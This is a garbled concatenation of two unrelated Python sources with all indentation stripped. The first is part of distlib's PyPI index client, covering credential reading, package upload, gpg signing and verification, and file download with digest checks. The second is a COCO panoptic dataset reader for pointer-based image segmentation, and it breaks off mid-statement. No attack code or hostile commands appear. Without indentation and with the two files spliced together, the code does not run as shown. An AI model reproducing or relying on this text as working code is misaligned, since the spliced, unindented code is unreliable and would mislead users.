boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username', )
self.password = cfg.get('password', )
self.realm = cfg.get('realm', )
self.url = cfg.get('repository', )
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
CocoPanoptic_Reader.py
|
#Reader for the coco panoptic data set for pointer based image segmentation
import numpy as np
import os
import scipy.misc as misc
import random
import cv2
import json
import threading
############################################################################################################
def rgb2id(color): # Convert annotation map from 3 channel RGB to instance
if isinstance(color, np.ndarray) and len(color.shape) == 3:
if color.dtype == np.uint8:
color = color.astype(np.uint32)
return color[:, :, 0] + 256 * color[:, :, 1] + 256 * 256 * color[:, :, 2]
return color[0] + 256 * color[1] + 256 * 256 * color[2]
#########################################################################################################################
#########################################################################################################################
class Reader:
# Initiate reader and define the main parameters for the data reader
def __init__(self, ImageDir="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/train2017",AnnotationDir="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/COCO_panoptic/panoptic_train2017/panoptic_train2017", DataFile="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/COCO_panoptic/panoptic_train2017.json",MaxBatchSize=100,MinSize=250,MaxSize=800,MaxPixels=800*800*5, AnnotationFileType="png", ImageFileType="jpg",UnlabeledTag=0,Suffle=True,TrainingMode=True):
self.ImageDir=ImageDir # Image dir
self.AnnotationDir=AnnotationDir # File containing image annotation
self.MaxBatchSize=MaxBatchSize # Max number of image in batch
self.MinSize=MinSize # Min image width and hight in pixels
self.MaxSize=MaxSize #Max image width and hight in pixels
self.MaxPixels=MaxPixels # Max number of pixel in all the batch (reduce to solve oom out of memory issues)
self.AnnotationFileType=AnnotationFileType # What is the the type (ending) of the annotation files
self.ImageFileType=ImageFileType # What is the the type (ending) of the image files
self.DataFile=DataFile # Json File that contain data on the annotation of each image
self.UnlabeledTag=UnlabeledTag # Value of unlabled region in the annotation map (usually 0)
self.ReadStuff = True # Read things that are not instace object (like sky or grass)
self.SplitThings = False#True # Split instance of things (object) to connected component region and use each connected region as an instance
self.SplitStuff = True # Split instance of things (object) to connected component region and use each connected region as instance
self.SplitCrowd = True # Split areas marked as Crowds using connected componennt
self.IgnoreCrowds = True # Ignore areas marked as crowd
self.PickBySize = True # Pick instances of with probablity proportional to their sizes
self.StuffAreaFactor=0.225 # Since we pick segments according to their size stuf segments (ground, sky) will have higher probability to be chosen compare to things (objets) this factor balance this
self.MinSegSize=100 # Ignore segments which are smaller then this size in pixel
self.Epoch = 0 # Training Epoch
self.itr = 0 # Training iteratation
self.suffle=Suffle # Suffle list of file
#........................Read data file................................................................................................................
with open(DataFile) as json_file:
self.AnnData=json.load(json_file)
#-------------------Get All files in folder--------------------------------------------------------------------------------------
self.FileList=[]
for FileName in os.listdir(AnnotationDir):
if AnnotationFileType in FileName:
self.FileList.append(FileName)
if self.suffle:
random.shuffle(self.FileList)
if TrainingMode: self.StartLoadBatch()
##############################################################################################################################################
#Get annotation data for specific nmage from the json file
def GetAnnnotationData(self, AnnFileName):
for item in self.AnnData['annotations']: # Get Annotation Data
if (item["file_name"] == AnnFileName):
return(item['segments_info'])
############################################################################################################################################
#Get information for specific catagory/Class id
def GetCategoryData(self,ID):
for item in self.AnnData['categories']:
if item["id"]==ID:
return item["name"],item["isthing"]
##########################################################################################################################################3333
#Split binary mask correspond to a singele segment into connected components
def GetConnectedSegment(self, Seg):
[NumCCmp, CCmpMask, CCompBB, CCmpCntr] = cv2.connectedComponentsWithStats(Seg.astype(np.uint8)) # apply connected component
Mask=np.zeros([NumCCmp,Seg.shape[0],Seg.shape[1]],dtype=bool)
BBox=np.zeros([NumCCmp,4])
Sz=np.zeros([NumCCmp],np.uint32)
for i in range(1,NumCCmp):
Mask[i-1] = (CCmpMask == i)
BBox[i-1] = CCompBB[i][:4]
Sz[i-1] = CCompBB[i][4] #segment Size
return Mask,BBox,Sz,NumCCmp-1
#################################################################################################################################################
# Pick and return random segment from the list and remove it from the segment list
def PickRandomSegment(self,Sgs,SumAreas):
if self.PickBySize: # Pick random segment with probability proportional to size
r = np.random.randint(SumAreas) + 1
TotAreas=0
for ind in range(Sgs.__len__()):
TotAreas+=Sgs[ind]['Area']
if TotAreas>=r:
break
else: ind=np.random.randint(len(Sgs)) #Pick Random segment with equal probability
# print("ind" + str(ind))
SelectedSg=Sgs.pop(ind)
SumAreas-=SelectedSg["Area"]
return SelectedSg,SumAreas
##########################################################################################################################
# Pick set of segments from the list and generate random ROI map by taking the inverse of the region define by these segments area
def GenerateRandomROIMask(self, Sgs, SumAreas):
ROI = np.ones(Sgs[0]["Mask"].shape)
if SumAreas<=0 and np.random.randint(6)==0: return ROI
r = np.random.randint(SumAreas) + 1
while (SumAreas>r):
SumAreasOld=SumAreas
SelectedSg, SumAreas=self.PickRandomSegment( Sgs, SumAreas)
# misc.imshow(SelectedSg["Mask"].astype(float))
if SumAreas>r:
ROI[SelectedSg["Mask"]]=0
# misc.imshow(ROI.astype(float))
else:
if np.random.randint(SumAreas,SumAreasOld)>r:# and (SumAreas>1000):
ROI[SelectedSg["Mask"]] = 0
else:
Sgs.append(SelectedSg)
return(ROI)
#############################################################################################################################
############################################################################################################################
#Pick random point from segment given as a binary mask
def PickRandomPointInSegment(self,Seg,ErodeMask=10):
x0 = int(np.floor(Seg["BBox"][0])) # Bounding box x position
Wbox = int(np.floor(Seg["BBox"][2])) # Bounding box width
y0 = int(np.floor(Seg["BBox"][1])) # Bounding box y position
Hbox = int(np.floor(Seg["BBox"][3])) # Bounding box height
if ErodeMask:
Msk = cv2.erode(Seg["Mask"].astype(np.uint8), np.ones((3, 3), np.uint8), iterations=ErodeMask)
if Msk.sum()==0: Msk=Seg["Mask"]
else:
Msk = Seg["Mask"]
while(True):
x = np.random.randint(Wbox) + x0
y = np.random.randint(Hbox) + y0
if (Msk[y,x])==1:
return x,y
##############################################################################################################################
# Display loaded data on screen (for debuging)
def DisplayTrainExample(self,Img2,ROI2,Segment2,SelectedPoint2):
Img=Img2.copy()
ROI=ROI2.copy()
Segment=Segment2.copy()
SelectedPoint=SelectedPoint2.copy()
misc.imshow(Img)
SelectedPoint = cv2.dilate(SelectedPoint.astype(np.uint8), np.ones((3, 3), np.uint8), iterations=1)
Img[SelectedPoint][:]=[255,0,0]
Img[:, :, 0] = SelectedPoint.astype(np.uint8)*255+ (1-SelectedPoint.astype(np.uint8))*Img[:, :, 0]
Img[:, :, 1] *= 1-SelectedPoint.astype(np.uint8)
Img[:, :, 2] *= 1-SelectedPoint.astype(np.uint8)
Img[ :, :, 0] *= 1-(ROI.astype(np.uint8)-Segment.astype(np.uint8))
#Img[:, :, 1] += ROI.astype(np.uint8)*40
Img[ :, :, 2] *= 1 - Segment.astype(np.uint8)
# misc.imshow(Img)
#print(ROI.mean())
ROI[0,0]=0
misc.imshow(ROI.astype(float))
misc.imshow( Segment.astype(float))
misc.imshow(SelectedPoint.astype(float))
misc.imshow(Img)
#############################################################################################################################
# Crop and resize image and mask and ROI to feet batch size
def CropResize(self,Img, Mask,bbox,ROImask,Px,Py,Hb,Wb):
# ========================resize image if it too small to the batch size==================================================================================
[h, w, d] = Img.shape
Rs = np.max((Hb / h, Wb / w))
Wbox = int(np.floor(bbox[2])) # Segment Bounding box width
Hbox = int(np.floor(bbox[3])) # Segment Bounding box height
Bs = np.min((Hb / Hbox, Wb / Wbox))
if Rs > 1 or Bs<1 or np.random.rand()<0.3: # Resize image and mask to batch size if mask is smaller then batch or if segment bounding box larger then batch image size
h = int(np.max((h * Rs, Hb)))
w = int(np.max((w * Rs, Wb)))
Img = cv2.resize(Img, dsize=(w, h), interpolation=cv2.INTER_LINEAR)
Mask = cv2.resize(Mask.astype(float), dsize=(w, h), interpolation=cv2.INTER_NEAREST)
ROImask = cv2.resize(ROImask.astype(float), dsize=(w, h), interpolation=cv2.INTER_NEAREST)
bbox = (np.float32(bbox) * Rs.astype(np.float)).astype(np.int64)
Px = int(float(Px) * Rs)
Py = int(float(Py) * Rs)
if Px>=w:
Px=w-1
if Py>=h:
Py=h-1
# =======================Crop image to fit batch size===================================================================================
x1 = int(np.floor(bbox[0])) # Bounding box x position
Wbox = int(np.floor(bbox[2])) # Bounding box width
y1 = int(np.floor(bbox[1])) # Bounding box y position
Hbox = int(np.floor(bbox[3])) # Bounding box height
if Wb > Wbox:
Xmax = np.min((w - Wb, x1))
Xmin = np.max((0, x1 - (Wb - Wbox)-1))
else:
Xmin = x1
Xmax = np.min((w - Wb, x1 + (Wbox - Wb)+1))
if Hb > Hbox:
Ymax = np.min((h - Hb, y1))
Ymin = np.max((0, y1 - (Hb - Hbox)-1))
else:
Ymin = y1
Ymax = np.min((h - Hb, y1 + (Hbox - Hb)+1))
if Ymax<=Ymin: y0=Ymin
else:
while(True):
y0 = np.random.randint(low=Ymin, high=Ymax + 1)
if (y0 <= Py) and Py < (y0 + Hb): break
if Xmax<=Xmin: x0=Xmin
else:
while (True):
x0 = np.random.randint(low=Xmin, high=Xmax + 1)
if (x0 <= Px) and Px < (x0 + Wb): break
# Img[:,:,1]*=Mask
# misc.imshow(Img)
Px-=x0
Py-=y0
Img = Img[y0:y0 + Hb, x0:x0 + Wb, :]
Mask = Mask[y0:y0 + Hb, x0:x0 + Wb]
ROImask = ROImask[y0:y0 + Hb, x0:x0 + Wb]
#------------------------------------------Verify shape match the batch shape----------------------------------------------------------------------------------------
if not (Img.shape[0] == Hb and Img.shape[1] == Wb): Img = cv2.resize(Img, dsize=(Wb, Hb),interpolation=cv2.INTER_LINEAR)
if not (Mask.shape[0] == Hb and Mask.shape[1] == Wb):Mask = cv2.resize(Mask.astype(float), dsize=(Wb, Hb), interpolation=cv2.INTER_NEAREST)
if not (ROImask.shape[0] == Hb and ROImask.shape[1] == Wb): ROImask = cv2.resize(ROImask.astype(float), dsize=(Wb, Hb), interpolation=cv2.INTER_NEAREST)
#-----------------------------------------------------------------------------------------------------------------------------------
return Img,Mask,ROImask,Px,Py
# misc.imshow(Img)
######################################################################################################
#Generate list of all segments in the image
# Given the annotation map a json data file create list of all segments and instance with info on each segment
#--------------------------Generate list of all segments--------------------------------------------------------------------------------
def GeneratListOfAllSegments(self,Ann,Ann_name,AddUnLabeled=False,IgnoreSmallSeg=True):
AnnList = self.GetAnnnotationData(Ann_name)
Sgs = [] # List of segments and their info
SumAreas=0 # Sum areas of all segments up to image
for an in AnnList:
an["name"], an["isthing"] = self.GetCategoryData(an["category_id"])
if (an["iscrowd"] and self.IgnoreCrowds) or (not an["isthing"] and not self.ReadStuff):
Ann[Ann == an['id']] = self.UnlabeledTag
continue
if (an["isthing"] and self.SplitThings) or (an["isthing"]==False and self.SplitStuff) or (an["iscrowd"] and self.SplitCrowd): #Things are objects that have instances
TMask, TBBox, TSz, TNm = self.GetConnectedSegment(Ann == an['id']) # Split to connected components
for i in range(TNm):
seg={}
seg["Mask"]=TMask[i]
seg["BBox"]=TBBox[i]
seg["Area"]=TSz[i]
if (not an["isthing"]): seg["Area"]*=self.StuffAreaFactor
if seg["Area"] < self.MinSegSize and IgnoreSmallSeg:
Ann[Ann == an['id']] = self.UnlabeledTag
continue
seg["NumParts"] =TNm
seg["IsSplit"]=TNm>1
seg["IsThing"]=an["isthing"]
seg["Name"]=an["name"]
seg["IsCrowd"]=an["iscrowd"]
seg["CatId"]=an["category_id"]
seg["IsLabeled"] = True
SumAreas+=seg["Area"]
Sgs.append(seg)
else: # none object classes such as sky
seg = {}
seg["Mask"] = (Ann == an['id'])
seg["BBox"] = an["bbox"]
seg["Area"] = an["area"]
if (not an["isthing"]): seg["Area"] *= self.StuffAreaFactor
if seg["Area"] < self.MinSegSize and IgnoreSmallSeg: # Ignore very small segments
Ann[Ann == an['id']] = self.UnlabeledTag
continue
seg["NumParts"] = 1
seg["IsSplit"] = False
seg["IsThing"] = an["isthing"]
seg["Name"] = an["name"]
seg["IsCrowd"] = an["iscrowd"]
seg["CatId"] = an["category_id"]
seg["IsLabeled"]=True
SumAreas += seg["Area"]
Sgs.append(seg)
if AddUnLabeled: #Add unlabeled region as additional segments
TMask, TBBox, TSz, TNm = self.GetConnectedSegment(Ann == self.UnlabeledTag) # Split to connected components
for i in range(TNm):
seg = {}
seg["Mask"] = TMask[i]
seg["BBox"] = TBBox[i]
seg["Area"] = TSz[i]
seg["NumParts"] = TNm
seg["Name"] ="unlabeled"
seg["CatId"] = self.UnlabeledTag
seg["IsLabeled"] = False
Sgs.append(seg)
return Sgs,SumAreas
##################################################################################################################################################
def LoadNextGivenROI(self,NewImg=True):
# This function is used serially on the same image cascade full image segmentation
# Pick random point on a given ROI mask
# return the point the ROI mask and the image
#-------------If new image load the next image and annotation data--------------------------------------------------
if NewImg:
Img_name=self.FileList[self.itr].replace(self.AnnotationFileType,self.ImageFileType)
Ann_name=self.FileList[self.itr] # Get label image name
# print(Ann_name)
# print(Img_name)
# print(Ann_name)
Img = cv2.imread(self.ImageDir + "/" + Img_name) # Load Image
Img = Img[...,:: -1]
if (Img.ndim == 2): # If grayscale turn to rgb
Img = np.expand_dims(Img, 3)
Img = np.concatenate([Img, Img, Img], axis=2)
Img = Img[:, :, 0:3] # Get first 3 channels incase there are more
Ann = cv2.imread(self.AnnotationDir + "/" + Ann_name) # Load Annotation
Ann = Ann[..., :: -1]
self.AnnColor=Ann
Ann=rgb2id(Ann)
# misc.imshow((Ann==0).astype(float))
# misc.imshow(Img)
H,W=Ann.shape
ROIMap=np.ones([H,W]) # Generate ROI mask that cover the full image
# AnnList = self.GetAnnnotationData(Ann_name)
Sgs, SumAreas = self.GeneratListOfAllSegments(Ann, Ann_name,AddUnLabeled=True,IgnoreSmallSeg=False)
self.Sgs=Sgs
self.BImgs = np.expand_dims(Img, axis=0).astype(np.float32)
# self.BAnnList = AnnList
self.BROIMask = np.expand_dims(ROIMap, axis=0).astype(np.float32)
self.BAnn = Ann.astype(np.float32)
#-----------------Load
else:
# Img = self.BImgs[0]
# AnnList = self.BAnnList
ROIMap = self.BROIMask[0]
Ann = self.BAnn
H, W = Ann.shape
# self.BCat = np.zeros((BatchSize
while (True):
x = np.random.randint(W)
y = np.random.randint(H)
if (ROIMap[y, x]) == 1: break
PointerMask=np.zeros(Ann.shape,dtype=float)
PointerMask[y,x]=1
PointerMask=np.expand_dims(PointerMask, axis=0).astype(float)
return PointerMask, self.BImgs ,self.BROIMask
#########################################################################################################################################
# # Given predicted segment (SegMask) and list of GT segments (self.Sgs)
# Find the GT segment with the highest IOU correlation to predictedSegMask
# USed for the evaluation of the serial region by region full image segmentation mode
def FindCorrespondingSegmentMaxIOU(self,SegMask):
MaxIOU=-1
TopSeg=0
for seg in self.Sgs:
IOU=(seg["Mask"] * SegMask).sum() / (seg["Mask"].sum() + SegMask.sum() - (seg["Mask"] * SegMask).sum())
if IOU>MaxIOU:
MaxIOU=IOU
TopSeg=seg
IOU = (TopSeg["Mask"] * SegMask).sum() / (TopSeg["Mask"].sum() + SegMask.sum() - (TopSeg["Mask"] * SegMask).sum())
Precision = (TopSeg["Mask"] * SegMask).sum() / SegMask.sum()
Recall = (TopSeg["Mask"] * SegMask).sum() / TopSeg["Mask"].sum()
if not TopSeg["IsLabeled"]: SegType = "Unlabeled"
elif TopSeg["IsCrowd"]:SegType = "crowd"
elif TopSeg["IsThing"]: SegType = "thing"
else: SegType = "stuff"
return IOU,Precision,Recall,SegType,TopSeg["Mask"].astype(float)
############################################################################################################################################################################################
# Read single training data
# Pick 1) random image 2) random segment from the image 3)random point on this 4) Random ROI for this segment
# This are used for training
# ==========================Read image annotation and data===============================================================================================
def LoadNext(self, batch_pos, itr_pos, Hb=-1, Wb=-1):
Img_name=self.FileList[itr_pos].replace(self.AnnotationFileType,self.ImageFileType)
Ann_name=self.FileList[itr_pos] # Get label image name
Img = cv2.imread(self.ImageDir + "/" + Img_name) # Load Image
Img = Img[...,:: -1]
if (Img.ndim == 2): # If grayscale turn to rgb
Img = np.expand_dims(Img, 3)
Img = np.concatenate([Img, Img, Img], axis=2)
Img = Img[:, :, 0:3] # Get first 3 channels incase there are more
Ann = cv2.imread(self.AnnotationDir + "/" + Ann_name) # Load Annotation
Ann = Ann[..., :: -1]
Ann=rgb2id(Ann)
#--------------------------Generate list of all segments using annotation map--------------------------------------------------------------------------------
Sgs,SumAreas= self.GeneratListOfAllSegments(Ann, Ann_name)
#----------------------------------------------------------------------------------------------------------------------------------------
if Sgs.__len__()>0:
SelectedSg, SumAreas = self.PickRandomSegment(Sgs, SumAreas)
else:
print("No Segments to pick")
itr_pos=np.random.randint(len(self.FileList))
return self.LoadNext(batch_pos,itr_pos,Hb,Wb)
if Sgs.__len__()>0:
ROIMask = self.GenerateRandomROIMask(Sgs, SumAreas)
else:
ROIMask = np.ones(Ann.shape)
Px, Py = self.PickRandomPointInSegment( SelectedSg)
if not Hb==-1:
Img, SegMask, ROIMask, Px, Py=self.CropResize(Img, SelectedSg["Mask"], SelectedSg["BBox"], ROIMask, Px, Py, Hb, Wb)
# else:
# SegMask=SelectedSg["Mask"]
#---------------------------------------------------------------------------------------------------------------------------------
PointerMap = np.zeros(SegMask.shape)
PointerMap[Py, Px] = 1
self.BImgs[batch_pos] = Img
self.BSegmentMask[batch_pos] = SegMask
self.BROIMask[batch_pos] = ROIMask
self.BPointerMap[batch_pos] = PointerMap
self.BIsThing[batch_pos] = SelectedSg["IsThing"]
self.BCat[batch_pos] = SelectedSg["CatId"]
############################################################################################################################################################
# Start load batch of images, segment masks, ROI masks, and pointer points for training MultiThreading s
def StartLoadBatch(self):
# =====================Initiate batch=============================================================================================
while True:
Hb = np.random.randint(low=self.MinSize, high=self.MaxSize) # Batch hight
Wb = np.random.randint(low=self.MinSize, high=self.MaxSize) # batch width
if Hb*Wb<self.MaxPixels: break
BatchSize = np.int(np.min((np.floor(self.MaxPixels / (Hb * Wb)), self.MaxBatchSize)))
self.BImgs = np.zeros((BatchSize, Hb, Wb, 3)) #
self.BSegmentMask = np.zeros((BatchSize, Hb, Wb))
self.BROIMask = np.zeros((BatchSize, Hb, Wb)) #
self.BPointerMap = np.zeros((BatchSize, Hb, Wb))
self.BIsThing = np.zeros((BatchSize))
self.BCat= np.zeros((BatchSize))
#===============if epoch finished reshuffle file list and start new epoch====================================
if self.itr+BatchSize >= len(self.FileList):
